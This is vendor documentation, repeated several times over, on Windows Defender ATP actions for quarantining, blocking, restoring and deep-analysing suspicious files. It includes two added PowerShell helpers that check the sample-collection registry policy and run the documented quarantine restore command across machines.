Before you can block files, you'll need to enable the feature.
1. In the navigation pane, select Settings > Advanced features > Block file.
2. Toggle the setting between On and Off and select Save preferences.

Block a file
1. Select the file you want to block. You can select a file from any of the following views or use the Search box:
Alerts - click the corresponding links from the Description or Details in the Artifact timeline
Search box - select File from the drop-down menu and enter the file name
2. Open the Actions menu and select Block.

3. Specify a reason and select Yes, block file to take action on the file.
The Action center shows the submission information:

Submission time - Shows when the action was submitted.


Submitting user - Shows who submitted the action on the file. You can view the comments provided by
the user by selecting the information icon.
Status - Indicates whether the file was added to or removed from the blacklist.
When the file is blocked, there will be a new event in the machine timeline.

NOTE
If a file was scanned before the action was taken, it may take longer to be effective on the device.

Notification on machine user:


When a file is being blocked on the machine, the following notification is displayed to inform the user that the file
was blocked:

NOTE
The Action button is turned off for files signed by Microsoft to prevent negative impact on machines in your organization
caused by the removal of files that might be related to the operating system.

For prevalent files in the organization, a warning is shown before an action is implemented to validate that the
operation is intended.

Remove file from blocked list


1. Select the file you want to remove from the blocked list. You can select a file from any of the following views
or use the Search box:
Alerts - Click the file links from the Description or Details in the Artifact timeline
Search box - Select File from the drop-down menu and enter the file name
2. Open the Actions menu and select Remove file from blocked list.

3. Type a comment and select Yes to take action on the file. The file will be allowed to run in the organization.
Check activity details in Action center
The Action center provides information on actions that were taken on a machine or file. You'll be able to view the
details of the last action that was taken on a file, such as stopped and quarantined files or blocked files.

Deep analysis
Cyber security investigations are typically triggered by an alert. Alerts are related to one or more observed files that
are often new or unknown. Clicking a file takes you to the file view where you can see the file's metadata. To enrich
the data related to the file, you can submit the file for deep analysis.
The deep analysis feature executes a file in a secure, fully instrumented cloud environment. Deep analysis results
show the file's activities, observed behaviors, and associated artifacts, such as dropped files, registry modifications,
and communication with IPs. Deep analysis currently supports extensive analysis of portable executable (PE) files
(including .exe and .dll files).
Deep analysis of a file takes several minutes. When the file analysis is complete, results are made available in the
File view page, under a new Deep analysis summary section. The summary includes a list of observed behaviors,
some of which can indicate malicious activity, and observables, including contacted IPs and files created on the disk.
Results of deep analysis are matched against threat intelligence and any matches will generate appropriate alerts.
Submit files for analysis
Use the deep analysis feature to investigate the details of any file, usually during an investigation of an alert or for
any other reason where you suspect malicious behavior. This feature is available in the context of the file view.
In the file's page, Submit for deep analysis is enabled when the file is available in the Windows Defender ATP
backend sample collection or if it was observed on a Windows 10 machine that supports submitting to deep
analysis.

NOTE
Only files from Windows 10 can be automatically collected.

You can also manually submit a sample through the Malware Protection Center Portal if the file was not observed
on a Windows 10 machine, and wait for the Submit for deep analysis button to become available.

NOTE
Due to backend processing flows in the Malware Protection Center Portal, there could be up to 10 minutes of latency
between file submission and availability of the deep analysis feature in Windows Defender ATP.

When the sample is collected, Windows Defender ATP runs the file in a secure environment and creates a
detailed report of observed behaviors and associated artifacts, such as files dropped on machines, communication
to IPs, and registry modifications.
Submit files for deep analysis:
1. Select the file that you want to submit for deep analysis. You can select or search a file from any of the following
views:
Alerts - click the file links from the Description or Details in the Artifact timeline
Machines list - click the file links from the Description or Details in the Machine in organization
section
Search box - select File from the drop-down menu and enter the file name
2. In the Deep analysis section of the file view, click Submit.

NOTE
Only PE files are supported, including .exe and .dll files.
A progress bar is displayed and provides information on the different stages of the analysis. You can then view the
report when the analysis is done.

NOTE
Depending on machine availability, sample collection time can vary. There is a 3-hour timeout for sample collection. The
collection will fail and the operation will abort if there is no online Windows 10 machine reporting at that time. You can
resubmit files for deep analysis to get fresh data on the file.

View deep analysis reports


View the deep analysis report that Windows Defender ATP provides to see the details of the deep analysis that was
conducted on the file you submitted. This feature is available in the file view context.
You can view the comprehensive report that provides details on the following sections:
Behaviors
Observables
The details provided can help you investigate if there are indications of a potential attack.
1. Select the file you submitted for deep analysis.
2. Click See the report below. Information on the analysis is displayed.

Troubleshoot deep analysis


If you encounter a problem when trying to submit a file, try each of the following troubleshooting steps.
1. Ensure that the file in question is a PE file. PE files typically have .exe or .dll extensions (executable programs or
applications).
2. Ensure the service has access to the file, that it still exists, and has not been corrupted or modified.
3. You can wait a short while and try to submit the file again, in case the queue is full or there was a temporary
connection or communication error.
4. If the sample collection policy is not configured, then the default behavior is to allow sample collection. If it is
configured, then verify the policy setting allows sample collection before submitting the file again. When
sample collection is configured, then check the following registry value:
Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
Name: AllowSampleCollection
Type: DWORD
Hexadecimal value:
Value = 0: block sample collection
Value = 1: allow sample collection

5. Change the organizational unit through the Group Policy. For more information, see Configure with Group
Policy.
6. If these steps do not resolve the issue, contact winatp@microsoft.com.
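The registry check in troubleshooting step 4, as an added example (not part of the Windows Defender ATP documentation) that reports the effective sample collection policy on the local machine, treating an absent key or value as the default (collection allowed) and flagging a value that is not a DWORD of 0 or 1:

```powershell
# Added example, not from the Windows Defender ATP documentation. Reports the effective
# sample collection policy described in troubleshooting step 4, on the local machine.
# Run from an elevated PowerShell prompt on the machine that failed to submit the sample.
$policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'
$valueName = 'AllowSampleCollection'

function Get-SampleCollectionPolicy {
    # Not configured (key or value absent) means the default applies: collection is allowed.
    if (-not (Test-Path -LiteralPath $policyKey)) {
        return [pscustomobject]@{ State = 'NotConfigured'; Value = $null; Effective = 'Allowed'; Detail = 'Policy key absent' }
    }
    $key = Get-Item -LiteralPath $policyKey
    if ($key.GetValueNames() -notcontains $valueName) {
        return [pscustomobject]@{ State = 'NotConfigured'; Value = $null; Effective = 'Allowed'; Detail = 'Value absent' }
    }

    $kind  = $key.GetValueKind($valueName)   # documented type is DWORD
    $value = $key.GetValue($valueName)
    if ($kind -ne 'DWord') {
        return [pscustomobject]@{ State = 'Misconfigured'; Value = $value; Effective = 'Unknown'; Detail = "Type is $kind, expected DWord" }
    }

    # 0 blocks sample collection, 1 allows it; anything else is outside the documented values.
    switch ($value) {
        0       { $state = 'Blocked';       $effective = 'Blocked' }
        1       { $state = 'Allowed';       $effective = 'Allowed' }
        default { $state = 'Misconfigured'; $effective = 'Unknown' }
    }
    [pscustomobject]@{ State = $state; Value = $value; Effective = $effective; Detail = "Type $kind" }
}

$policy = Get-SampleCollectionPolicy
$policy | Format-List

if ($policy.Effective -ne 'Allowed') {
    Write-Warning 'Sample collection is not allowed on this machine; deep analysis submissions will fail until the policy allows it.'
}
```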

Related topic
Take response actions on a machine
Take response actions on a file
4/19/2019 • 10 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP )

Want to experience Windows Defender ATP? Sign up for a free trial.

Quickly respond to detected attacks by stopping and quarantining files or blocking a file. After taking action on files,
you can check activity details on the Action center.

IMPORTANT
These response actions are only available for machines on Windows 10, version 1703 or later.

You can also submit files for deep analysis to run the file in a secure cloud sandbox. When the analysis is complete,
you'll get a detailed report that provides information about the behavior of the file.

Stop and quarantine files in your network


You can contain an attack in your organization by stopping the malicious process and quarantine the file where it
was observed.

IMPORTANT
You can only take this action if:
The machine you're taking the action on is running Windows 10, version 1703 or later
The file does not belong to trusted third-party publishers or not signed by Microsoft
Windows Defender Antivirus must at least be running on Passive mode. For more information, see Windows Defender
Antivirus compatibility.

The Stop and Quarantine File action includes stopping running processes, quarantining the files, and deleting
persistency such as registry keys.
The action takes effect on machines with Windows 10, version 1703 or later, where the file was observed in the last
30 days.

NOTE
You’ll be able to restore the file from quarantine at any time.

Stop and quarantine files


1. Select the file you want to stop and quarantine. You can select a file from any of the following views or use
the Search box:
Alerts - click the corresponding links from the Description or Details in the Artifact timeline
Search box - select File from the drop–down menu and enter the file name
2. Open the Actions menu and select Stop and Quarantine File.
3. Specify a reason, then click Yes, stop and quarantine.

The Action center shows the submission information:


Submission time - Shows when the action was submitted.
Success - Shows the number of machines where the file has been stopped and quarantined.
Failed - Shows the number of machines where the action failed and details about the failure.
Pending - Shows the number of machines where the file is yet to be stopped and quarantined from. This
can take time for cases when the machine is offline or not connected to the network.
4. Select any of the status indicators to view more information about the action. For example, select Failed to
see where the action failed.
Notification on machine user:
When the file is being removed from a machine, the following notification is shown:

In the machine timeline, a new event is added for each machine where a file was stopped and quarantined.

IMPORTANT
The Action button is turned off for files signed by Microsoft as well as trusted third–party publishers to prevent the removal
of critical system files and files used by important applications.
For prevalent files in the organization, a warning is shown before an action is implemented to validate that the
operation is intended.

Remove file from quarantine


You can roll back and remove a file from quarantine if you’ve determined that it’s clean after an investigation. Run
the following command on each machine where the file was quarantined.
1. Open an elevated command–line prompt on the machine:
a. Go to Start and type cmd.
b. Right–click Command prompt and select Run as administrator.
2. Enter the following command, and press Enter:

“%ProgramFiles%\Windows Defender\MpCmdRun.exe” –Restore –Name EUS:Win32/CustomEnterpriseBlock –All

NOTE
Windows Defender ATP will restore all files that were quarantined on this machine in the last 30 days.

Block files in your network


You can prevent further propagation of an attack in your organization by banning potentially malicious files or
suspected malware. If you know a potentially malicious portable executable (PE ) file, you can block it. This
operation will prevent it from being read, written, or executed on machines in your organization.

IMPORTANT
This feature is available if your organization uses Windows Defender Antivirus and Cloud–based protection is enabled. For
more information, see Manage cloud–based protection.
The Antimalware client version must be 4.18.1901.x or later.
This feature is designed to prevent suspected malware (or potentially malicious files) from being downloaded from the
web. It currently supports portable executable (PE) files, including .exe and .dll files. The coverage will be extended over
time.
This response action is available for machines on Windows 10, version 1703 or later.
The allow or block function cannot be done on files if the file's classification exists on the device's cache prior to the allow or
block action.
NOTE
The PE file needs to be in the machine timeline for you to be able to take this action.
There may be a couple of minutes of latency between the time the action is taken and the actual file being blocked.

Enable the block file feature


Before you can block files, you'll need to enable the feature.
1. In the navigation pane, select Settings > Advanced features > Block file.
2. Toggle the setting between On and Off and select Save preferences.

Block a file
1. Select the file you want to block. You can select a file from any of the following views or use the Search box:
Alerts - click the corresponding links from the Description or Details in the Artifact timeline
Search box - select File from the drop–down menu and enter the file name
2. Open the Actions menu and select Block.

3. Specify a reason and select Yes, block file to take action on the file.
The Action center shows the submission information:

Submission time - Shows when the action was submitted.


Submitting user - Shows who submitted the action on the file. You can view the comments provided by
the user by selecting the information icon.
Status - Indicates whether the file was added to or removed from the blacklist.
When the file is blocked, there will be a new event in the machine timeline.

NOTE
-If a file was scanned before the action was taken, it may take longer to be effective on the device.

Notification on machine user:


When a file is being blocked on the machine, the following notification is displayed to inform the user that the file
was blocked:

NOTE
The Action button is turned off for files signed by Microsoft to prevent negative impact on machines in your organization
caused by the removal of files that might be related to the operating system.

For prevalent files in the organization, a warning is shown before an action is implemented to validate that the
operation is intended.

Remove file from blocked list


1. Select the file you want to remove from the blocked list. You can select a file from any of the following views
or use the Search box:
Alerts - Click the file links from the Description or Details in the Artifact timeline
Search box - Select File from the drop–down menu and enter the file name
2. Open the Actions menu and select Remove file from blocked list.

3. Type a comment and select Yes to take action on the file. The file will be allowed to run in the organization.
Check activity details in Action center
The Action center provides information on actions that were taken on a machine or file. You’ll be able to view the
details on the last action that were taken on a file such as stopped and quarantined files or blocked files.

Deep analysis
Cyber security investigations are typically triggered by an alert. Alerts are related to one or more observed files that
are often new or unknown. Clicking a file takes you to the file view where you can see the file's metadata. To enrich
the data related to the file, you can submit the file for deep analysis.
The deep analysis feature executes a file in a secure, fully instrumented cloud environment. Deep analysis results
show the file's activities, observed behaviors, and associated artifacts, such as dropped files, registry modifications,
and communication with IPs. Deep analysis currently supports extensive analysis of portable executable (PE ) files
(including .exe and .dll files).
Deep analysis of a file takes several minutes. When the file analysis is complete, results are made available in the
File view page, under a new Deep analysis summary section. The summary includes a list of observed behaviors,
some of which can indicate malicious activity, and observables, including contacted IPs and files created on the disk.
Results of deep analysis are matched against threat intelligence and any matches will generate appropriate alerts.
Submit files for analysis
Use the deep analysis feature to investigate the details of any file, usually during an investigation of an alert or for
any other reason where you suspect malicious behavior. This feature is available in the context of the file view.
In the file's page, Submit for deep analysis is enabled when the file is available in the Windows Defender ATP
backend sample collection or if it was observed on a Windows 10 machine that supports submitting to deep
analysis.

NOTE
Only files from Windows 10 can be automatically collected.

You can also manually submit a sample through the Malware Protection Center Portal if the file was not observed
on a Windows 10 machine, and wait for Submit for deep analysis button to become available.

NOTE
Due to backend processing flows in the Malware Protection Center Portal, there could be up to 10 minutes of latency
between file submission and availability of the deep analysis feature in Windows Defender ATP.

When the sample is collected, Windows Defender ATP runs the file in is a secure environment and creates a
detailed report of observed behaviors and associated artifacts, such as files dropped on machines, communication
to IPs, and registry modifications.
Submit files for deep analysis:
1. Select the file that you want to submit for deep analysis. You can select or search a file from any of the following
views:
Alerts - click the file links from the Description or Details in the Artifact timeline
Machines list - click the file links from the Description or Details in the Machine in organization
section
Search box - select File from the drop–down menu and enter the file name
2. In the Deep analysis section of the file view, click Submit.

Note Only PE files are supported, including .exe and .dll files
A progress bar is displayed and provides information on the different stages of the analysis. You can then view the
report when the analysis is done.

NOTE
Depending on machine availability, sample collection time can vary. There is a 3–hour timeout for sample collection. The
collection will fail and the operation will abort if there is no online Windows 10 machine reporting at that time. You can re–
submit files for deep analysis to get fresh data on the file.

View deep analysis reports


View the deep analysis report that Windows Defender ATP provides to see the details of the deep analysis that was
conducted on the file you submitted. This feature is available in the file view context.
You can view the comprehensive report that provides details on the following sections:
Behaviors
Observables
The details provided can help you investigate if there are indications of a potential attack.
1. Select the file you submitted for deep analysis.
2. Click See the report below. Information on the analysis is displayed.

Troubleshoot deep analysis


If you encounter a problem when trying to submit a file, try each of the following troubleshooting steps.
1. Ensure that the file in question is a PE file. PE files typically have .exe or .dll extensions (executable programs or
applications).
2. Ensure the service has access to the file, that it still exists, and has not been corrupted or modified.
3. You can wait a short while and try to submit the file again, in case the queue is full or there was a temporary
connection or communication error.
4. If the sample collection policy is not configured, then the default behavior is to allow sample collection. If it is
configured, then verify the policy setting allows sample collection before submitting the file again. When
sample collection is configured, then check the following registry value:
Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
Name: AllowSampleCollection
Type: DWORD
Hexadecimal value :
Value = 0 – block sample collection
Value = 1 – allow sample collection

5. Change the organizational unit through the Group Policy. For more information, see Configure with Group
Policy.
6. If these steps do not resolve the issue, contact winatp@microsoft.com.

Related topic
Take response actions on a machine
Take response actions on a file
4/19/2019 • 10 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP )

Want to experience Windows Defender ATP? Sign up for a free trial.

Quickly respond to detected attacks by stopping and quarantining files or blocking a file. After taking action on files,
you can check activity details on the Action center.

IMPORTANT
These response actions are only available for machines on Windows 10, version 1703 or later.

You can also submit files for deep analysis to run the file in a secure cloud sandbox. When the analysis is complete,
you'll get a detailed report that provides information about the behavior of the file.

Stop and quarantine files in your network


You can contain an attack in your organization by stopping the malicious process and quarantine the file where it
was observed.

IMPORTANT
You can only take this action if:
The machine you're taking the action on is running Windows 10, version 1703 or later
The file does not belong to trusted third-party publishers or not signed by Microsoft
Windows Defender Antivirus must at least be running on Passive mode. For more information, see Windows Defender
Antivirus compatibility.

The Stop and Quarantine File action includes stopping running processes, quarantining the files, and deleting
persistency such as registry keys.
The action takes effect on machines with Windows 10, version 1703 or later, where the file was observed in the last
30 days.

NOTE
You’ll be able to restore the file from quarantine at any time.

Stop and quarantine files


1. Select the file you want to stop and quarantine. You can select a file from any of the following views or use
the Search box:
Alerts - click the corresponding links from the Description or Details in the Artifact timeline
Search box - select File from the drop–down menu and enter the file name
2. Open the Actions menu and select Stop and Quarantine File.
3. Specify a reason, then click Yes, stop and quarantine.

The Action center shows the submission information:


Submission time - Shows when the action was submitted.
Success - Shows the number of machines where the file has been stopped and quarantined.
Failed - Shows the number of machines where the action failed and details about the failure.
Pending - Shows the number of machines where the file is yet to be stopped and quarantined from. This
can take time for cases when the machine is offline or not connected to the network.
4. Select any of the status indicators to view more information about the action. For example, select Failed to
see where the action failed.
Notification on machine user:
When the file is being removed from a machine, the following notification is shown:

In the machine timeline, a new event is added for each machine where a file was stopped and quarantined.

IMPORTANT
The Action button is turned off for files signed by Microsoft as well as trusted third–party publishers to prevent the removal
of critical system files and files used by important applications.
For prevalent files in the organization, a warning is shown before an action is implemented to validate that the
operation is intended.

Remove file from quarantine


You can roll back and remove a file from quarantine if you’ve determined that it’s clean after an investigation. Run
the following command on each machine where the file was quarantined.
1. Open an elevated command–line prompt on the machine:
a. Go to Start and type cmd.
b. Right–click Command prompt and select Run as administrator.
2. Enter the following command, and press Enter:

“%ProgramFiles%\Windows Defender\MpCmdRun.exe” –Restore –Name EUS:Win32/CustomEnterpriseBlock –All

NOTE
Windows Defender ATP will restore all files that were quarantined on this machine in the last 30 days.

Block files in your network


You can prevent further propagation of an attack in your organization by banning potentially malicious files or
suspected malware. If you know a potentially malicious portable executable (PE ) file, you can block it. This
operation will prevent it from being read, written, or executed on machines in your organization.

IMPORTANT
This feature is available if your organization uses Windows Defender Antivirus and Cloud–based protection is enabled. For
more information, see Manage cloud–based protection.
The Antimalware client version must be 4.18.1901.x or later.
This feature is designed to prevent suspected malware (or potentially malicious files) from being downloaded from the
web. It currently supports portable executable (PE) files, including .exe and .dll files. The coverage will be extended over
time.
This response action is available for machines on Windows 10, version 1703 or later.
The allow or block function cannot be done on files if the file's classification exists on the device's cache prior to the allow or
block action.
NOTE
The PE file needs to be in the machine timeline for you to be able to take this action.
There may be a couple of minutes of latency between the time the action is taken and the actual file being blocked.

Enable the block file feature


Before you can block files, you'll need to enable the feature.
1. In the navigation pane, select Settings > Advanced features > Block file.
2. Toggle the setting between On and Off and select Save preferences.

Block a file
1. Select the file you want to block. You can select a file from any of the following views or use the Search box:
Alerts - click the corresponding links from the Description or Details in the Artifact timeline
Search box - select File from the drop–down menu and enter the file name
2. Open the Actions menu and select Block.

3. Specify a reason and select Yes, block file to take action on the file.
The Action center shows the submission information:

Submission time - Shows when the action was submitted.


Submitting user - Shows who submitted the action on the file. You can view the comments provided by
the user by selecting the information icon.
Status - Indicates whether the file was added to or removed from the blacklist.
When the file is blocked, there will be a new event in the machine timeline.

NOTE
-If a file was scanned before the action was taken, it may take longer to be effective on the device.

Notification on machine user:


When a file is being blocked on the machine, the following notification is displayed to inform the user that the file
was blocked:

NOTE
The Action button is turned off for files signed by Microsoft to prevent negative impact on machines in your organization
caused by the removal of files that might be related to the operating system.

For prevalent files in the organization, a warning is shown before an action is implemented to validate that the
operation is intended.

Remove file from blocked list


1. Select the file you want to remove from the blocked list. You can select a file from any of the following views
or use the Search box:
Alerts - Click the file links from the Description or Details in the Artifact timeline
Search box - Select File from the drop–down menu and enter the file name
2. Open the Actions menu and select Remove file from blocked list.

3. Type a comment and select Yes to take action on the file. The file will be allowed to run in the organization.
Check activity details in Action center
The Action center provides information on actions that were taken on a machine or file. You’ll be able to view the
details on the last action that were taken on a file such as stopped and quarantined files or blocked files.

Deep analysis
Cyber security investigations are typically triggered by an alert. Alerts are related to one or more observed files that
are often new or unknown. Clicking a file takes you to the file view where you can see the file's metadata. To enrich
the data related to the file, you can submit the file for deep analysis.
The deep analysis feature executes a file in a secure, fully instrumented cloud environment. Deep analysis results
show the file's activities, observed behaviors, and associated artifacts, such as dropped files, registry modifications,
and communication with IPs. Deep analysis currently supports extensive analysis of portable executable (PE ) files
(including .exe and .dll files).
Deep analysis of a file takes several minutes. When the file analysis is complete, results are made available in the
File view page, under a new Deep analysis summary section. The summary includes a list of observed behaviors,
some of which can indicate malicious activity, and observables, including contacted IPs and files created on the disk.
Results of deep analysis are matched against threat intelligence and any matches will generate appropriate alerts.
Submit files for analysis
Use the deep analysis feature to investigate the details of any file, usually during an investigation of an alert or for
any other reason where you suspect malicious behavior. This feature is available in the context of the file view.
In the file's page, Submit for deep analysis is enabled when the file is available in the Windows Defender ATP
backend sample collection or if it was observed on a Windows 10 machine that supports submitting to deep
analysis.

NOTE
Only files from Windows 10 can be automatically collected.

You can also manually submit a sample through the Malware Protection Center Portal if the file was not observed
on a Windows 10 machine, and wait for Submit for deep analysis button to become available.

NOTE
Due to backend processing flows in the Malware Protection Center Portal, there could be up to 10 minutes of latency
between file submission and availability of the deep analysis feature in Windows Defender ATP.

When the sample is collected, Windows Defender ATP runs the file in is a secure environment and creates a
detailed report of observed behaviors and associated artifacts, such as files dropped on machines, communication
to IPs, and registry modifications.
Submit files for deep analysis:
1. Select the file that you want to submit for deep analysis. You can select or search a file from any of the following
views:
Alerts - click the file links from the Description or Details in the Artifact timeline
Machines list - click the file links from the Description or Details in the Machine in organization
section
Search box - select File from the drop–down menu and enter the file name
2. In the Deep analysis section of the file view, click Submit.

Note Only PE files are supported, including .exe and .dll files
A progress bar is displayed and provides information on the different stages of the analysis. You can then view the
report when the analysis is done.

NOTE
Depending on machine availability, sample collection time can vary. There is a 3–hour timeout for sample collection. The
collection will fail and the operation will abort if there is no online Windows 10 machine reporting at that time. You can re–
submit files for deep analysis to get fresh data on the file.

View deep analysis reports


View the deep analysis report that Windows Defender ATP provides to see the details of the deep analysis that was
conducted on the file you submitted. This feature is available in the file view context.
You can view the comprehensive report that provides details on the following sections:
Behaviors
Observables
The details provided can help you investigate if there are indications of a potential attack.
1. Select the file you submitted for deep analysis.
2. Click See the report below. Information on the analysis is displayed.

Troubleshoot deep analysis


If you encounter a problem when trying to submit a file, try each of the following troubleshooting steps.
1. Ensure that the file in question is a PE file. PE files typically have .exe or .dll extensions (executable programs or
applications).
2. Ensure the service has access to the file, that it still exists, and has not been corrupted or modified.
3. You can wait a short while and try to submit the file again, in case the queue is full or there was a temporary
connection or communication error.
4. If the sample collection policy is not configured, the default behavior is to allow sample collection. If it is
configured, verify that the policy setting allows sample collection before submitting the file again. When
sample collection is configured, check the following registry value:
Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
Name: AllowSampleCollection
Type: DWORD
Hexadecimal value:
Value = 0 - block sample collection
Value = 1 - allow sample collection

5. Change the organizational unit through the Group Policy. For more information, see Configure with Group
Policy.
6. If these steps do not resolve the issue, contact winatp@microsoft.com.
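The policy check in step 4, as an added PowerShell example (not part of the Windows Defender ATP documentation): it reads the registry value listed above and reports the three possible states, including the "not configured" case where the documented default is to allow collection. The function name is ours; the registry path and value name are the ones given in step 4.

```powershell
# Added example, not from the Windows Defender ATP docs: report whether the sample
# collection policy allows deep-analysis sample collection on this machine.
function Get-AtpSampleCollectionState {
    [CmdletBinding()]
    param(
        # Registry key and value from troubleshooting step 4 (overridable for lab testing)
        [string]$Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection',
        [string]$Name = 'AllowSampleCollection'
    )

    # A missing key or a missing value both mean "policy not configured";
    # Get-ItemProperty emits a non-terminating error for either, which we silence.
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) {
        return [pscustomobject]@{
            Configured = $false
            Value      = $null
            Allowed    = $true   # documented default when the policy is not configured
            Note       = 'Policy not configured; default behavior allows sample collection'
        }
    }

    $value = [int]$item.$Name
    switch ($value) {
        0       { $allowed = $false; $note = 'Policy blocks sample collection; submissions will fail' }
        1       { $allowed = $true;  $note = 'Policy allows sample collection' }
        default { $allowed = $false; $note = "Unexpected value $value; only 0 and 1 are documented" }
    }
    [pscustomobject]@{ Configured = $true; Value = $value; Allowed = $allowed; Note = $note }
}

# Local check (reading HKLM policy keys does not require elevation).
Get-AtpSampleCollectionState | Format-List

# The same check across several machines over WinRM; the names are placeholders.
# ${function:Name} yields the function body as a script block, param block included.
$machines = 'WKS-01', 'WKS-02'
Invoke-Command -ComputerName $machines -ScriptBlock ${function:Get-AtpSampleCollectionState} -ErrorAction Continue |
    Select-Object PSComputerName, Configured, Value, Allowed, Note |
    Format-Table -AutoSize
```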

Related topic
Take response actions on a machine
4/19/2019 • 10 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

Quickly respond to detected attacks by stopping and quarantining files or blocking a file. After taking action on
files, you can check activity details on the Action center.

IMPORTANT
These response actions are only available for machines on Windows 10, version 1703 or later.

You can also submit files for deep analysis to run the file in a secure cloud sandbox. When the analysis is
complete, you'll get a detailed report that provides information about the behavior of the file.

Stop and quarantine files in your network


You can contain an attack in your organization by stopping the malicious process and quarantining the file where it
was observed.

IMPORTANT
You can only take this action if:
The machine you're taking the action on is running Windows 10, version 1703 or later
The file does not belong to a trusted third-party publisher and is not signed by Microsoft
Windows Defender Antivirus must at least be running in Passive mode. For more information, see Windows Defender
Antivirus compatibility.

The Stop and Quarantine File action includes stopping running processes, quarantining the files, and deleting
persistence mechanisms such as registry keys.
The action takes effect on machines with Windows 10, version 1703 or later, where the file was observed in the
last 30 days.

NOTE
You’ll be able to restore the file from quarantine at any time.

Stop and quarantine files


1. Select the file you want to stop and quarantine. You can select a file from any of the following views or
use the Search box:
Alerts - click the corresponding links from the Description or Details in the Artifact timeline
Search box - select File from the drop-down menu and enter the file name
2. Open the Actions menu and select Stop and Quarantine File.
3. Specify a reason, then click Yes, stop and quarantine.

The Action center shows the submission information:


Submission time - Shows when the action was submitted.
Success - Shows the number of machines where the file has been stopped and quarantined.
Failed - Shows the number of machines where the action failed and details about the failure.
Pending - Shows the number of machines where the file has not yet been stopped and quarantined.
This can take time when the machine is offline or not connected to the network.
4. Select any of the status indicators to view more information about the action. For example, select Failed
to see where the action failed.
Notification to the machine user:
When the file is being removed from a machine, the following notification is shown:

In the machine timeline, a new event is added for each machine where a file was stopped and quarantined.

IMPORTANT
The Action button is turned off for files signed by Microsoft as well as trusted third-party publishers to prevent the
removal of critical system files and files used by important applications.
For prevalent files in the organization, a warning is shown before an action is implemented to validate that the
operation is intended.

Remove file from quarantine


You can roll back and remove a file from quarantine if you’ve determined that it’s clean after an investigation.
Run the following command on each machine where the file was quarantined.
1. Open an elevated command-line prompt on the machine:
a. Go to Start and type cmd.
b. Right-click Command prompt and select Run as administrator.
2. Enter the following command, and press Enter:

"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -Restore -Name EUS:Win32/CustomEnterpriseBlock -All

NOTE
Windows Defender ATP will restore all files that were quarantined on this machine in the last 30 days.
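The text above says to run the restore command on each machine where the file was quarantined. As an added PowerShell example (not part of the Windows Defender ATP documentation), this fans the documented MpCmdRun command out over a list of machines with PowerShell remoting, records each machine's exit code, and keeps going when a machine is offline. It assumes WinRM is enabled and the caller is a local administrator on every target; the function name and the machine names are placeholders.

```powershell
# Added example, not from the Windows Defender ATP docs: run the documented
# MpCmdRun.exe -Restore command on several machines and collect the results.
function Restore-AtpQuarantinedFiles {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [Parameter(Mandatory)][string[]]$ComputerName,
        # Threat name under which Stop and Quarantine File places items, as given on the page
        [string]$ThreatName = 'EUS:Win32/CustomEnterpriseBlock'
    )

    # Script block executed on each target; must be self-contained (no outer variables).
    $remote = {
        param($ThreatName)
        $exe = Join-Path $env:ProgramFiles 'Windows Defender\MpCmdRun.exe'
        if (-not (Test-Path $exe)) {
            return [pscustomobject]@{ ExitCode = $null; Output = "MpCmdRun.exe not found at $exe" }
        }
        # Same command as in the procedure above; restores every quarantined item with that
        # threat name (per the note, everything quarantined on this machine in the last 30 days).
        $out = & $exe -Restore -Name $ThreatName -All 2>&1
        [pscustomobject]@{ ExitCode = $LASTEXITCODE; Output = ($out | Out-String).Trim() }
    }

    foreach ($machine in $ComputerName) {
        # -WhatIf / -Confirm support, since restoring from quarantine is a deliberate rollback
        if (-not $PSCmdlet.ShouldProcess($machine, "Restore quarantined files for $ThreatName")) { continue }
        try {
            $r = Invoke-Command -ComputerName $machine -ScriptBlock $remote `
                                -ArgumentList $ThreatName -ErrorAction Stop
            [pscustomobject]@{ Machine = $machine; ExitCode = $r.ExitCode; Output = $r.Output }
        } catch {
            # Offline machine or WinRM failure: record it so the list can be re-run later
            [pscustomobject]@{ Machine = $machine; ExitCode = $null
                               Output  = "Remoting failed: $($_.Exception.Message)" }
        }
    }
}

# Placeholder machine names. Preview the targets first, then run for real;
# an ExitCode of 0 means MpCmdRun completed the restore on that machine.
Restore-AtpQuarantinedFiles -ComputerName 'WKS-01', 'WKS-02' -WhatIf
Restore-AtpQuarantinedFiles -ComputerName 'WKS-01', 'WKS-02' | Format-Table -AutoSize
```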

Block files in your network


You can prevent further propagation of an attack in your organization by banning potentially malicious files or
suspected malware. If you know a potentially malicious portable executable (PE) file, you can block it. This
operation will prevent it from being read, written, or executed on machines in your organization.

IMPORTANT
This feature is available if your organization uses Windows Defender Antivirus and Cloud-based protection is enabled.
For more information, see Manage cloud-based protection.
The Antimalware client version must be 4.18.1901.x or later.
This feature is designed to prevent suspected malware (or potentially malicious files) from being downloaded from the
web. It currently supports portable executable (PE) files, including .exe and .dll files. The coverage will be extended over
time.
This response action is available for machines on Windows 10, version 1703 or later.
The allow or block function cannot be done on files if the file's classification exists on the device's cache prior to the
allow or block action.
NOTE
The PE file needs to be in the machine timeline for you to be able to take this action.
There may be a couple of minutes of latency between the time the action is taken and the actual file being blocked.

Enable the block file feature


Before you can block files, you'll need to enable the feature.
1. In the navigation pane, select Settings > Advanced features > Block file.
2. Toggle the setting between On and Off and select Save preferences.

Block a file
1. Select the file you want to block. You can select a file from any of the following views or use the Search
box:
Alerts - click the corresponding links from the Description or Details in the Artifact timeline
Search box - select File from the drop-down menu and enter the file name
2. Open the Actions menu and select Block.

3. Specify a reason and select Yes, block file to take action on the file.
The Action center shows the submission information:
Submission time - Shows when the action was submitted.
Submitting user - Shows who submitted the action on the file. You can view the comments provided
by the user by selecting the information icon.
Status - Indicates whether the file was added to or removed from the blacklist.
When the file is blocked, there will be a new event in the machine timeline.

NOTE
If a file was scanned before the action was taken, it may take longer to be effective on the device.

Notification on machine user:


When a file is being blocked on the machine, the following notification is displayed to inform the user that the
file was blocked:

